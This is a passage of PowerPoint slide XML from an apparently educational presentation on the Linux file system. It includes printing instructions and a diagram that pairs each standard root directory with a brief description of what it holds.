      <a:lvl6pPr marL="2519363" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:tabLst>
          <a:tab pos="8064500" algn="l"/>
        </a:tabLst>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2976563" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:tabLst>
          <a:tab pos="8064500" algn="l"/>
        </a:tabLst>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3433763" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:tabLst>
          <a:tab pos="8064500" algn="l"/>
        </a:tabLst>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3890963" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:tabLst>
          <a:tab pos="8064500" algn="l"/>
        </a:tabLs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www.tecmint.com/exploring-proc-file-system-in-linux/"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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/></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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto6.wdp"/></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12" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto5.wdp"/><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6.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto7.wdp"/></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Do not print the following hidden slides in SSG: 0, 10, 13, 15, 18, 21, 38, 54, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>58, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>74 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>75</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Print the following hidden slides in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FA0EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>r full size in back off SSG: 74 and 75</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Print Instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1329311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Linux File System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="973281" y="3271260"/>
            <a:ext cx="1387781" cy="1315754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Root Directory</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Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4089985" y="1502115"/>
            <a:ext cx="1501647" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C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/bin/</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099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/boot/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>
              <a:ext cx="964941" cy="403654"/>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/dev/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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etc</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27" name="Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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/home/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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/lib/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FA0E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/media</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30" name="Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00206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mnt</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31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00DED9"/>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/opt/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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sbin</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33" name="Rectangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC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srv</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34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="6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tmp</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35" name="Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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usr</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36" name="Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763265"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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var</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37" name="Rectangle 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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/root/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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proc</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Straight Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="1656360"/>
            <a:ext cx="1728928" cy="2272777"/>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42" name="Straight Connector 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="1964851"/>
            <a:ext cx="1728926" cy="1964286"/>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45" name="Straight Connector 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2273340"/>
            <a:ext cx="1728926" cy="1655797"/>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52" name="Straight Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2581830"/>
            <a:ext cx="1728925" cy="1347307"/>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54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2890319"/>
            <a:ext cx="1728926" cy="1038818"/>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56" name="Straight Connector 55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3198810"/>
            <a:ext cx="1728925" cy="730327"/>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58" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="38" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728925" cy="2354571"/>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60" name="Straight Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="2046081"/>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62" name="Straight Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="1737592"/>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64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="1429101"/>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66" name="Straight Connector 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728929" cy="195142"/>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68" name="Straight Connector 67"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3815790"/>
            <a:ext cx="1728923" cy="113347"/>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70" name="Straight Connector 69"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3507300"/>
            <a:ext cx="1728925" cy="421837"/>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72" name="Straight Connector 71"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="812122"/>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74" name="Straight Connector 73"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="1120612"/>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76" name="Straight Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="503632"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Group 91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5591626" y="1502115"/>
            <a:ext cx="5108211" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Rectangle 92"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C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Essential user command </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>inaries</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Rectangle 93"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099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Static files of Boot Loader</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95" name="Rectangle 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>
              <a:ext cx="964941" cy="403654"/>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Device files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96" name="Rectangle 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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Host-specific system configuration</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97" name="Rectangle 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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User home directories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98" name="Rectangle 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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Shared libraries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99" name="Rectangle 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FA0E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Mount point for removable</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> media</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0" name="Rectangle 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00206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Mount point for file systems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1" name="Rectangle 100"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00DED9"/>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Add-on application software packages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2" name="Rectangle 101"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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System binaries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3" name="Rectangle 102"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC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Data for services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4" name="Rectangle 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="6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Temp files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5" name="Rectangle 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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User utilities and applications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6" name="Rectangle 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763266"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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Variable files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7" name="Rectangle 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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Home directory for root user</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8" name="Rectangle 107"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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Virtual </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>filesystem</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> for Kernel</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
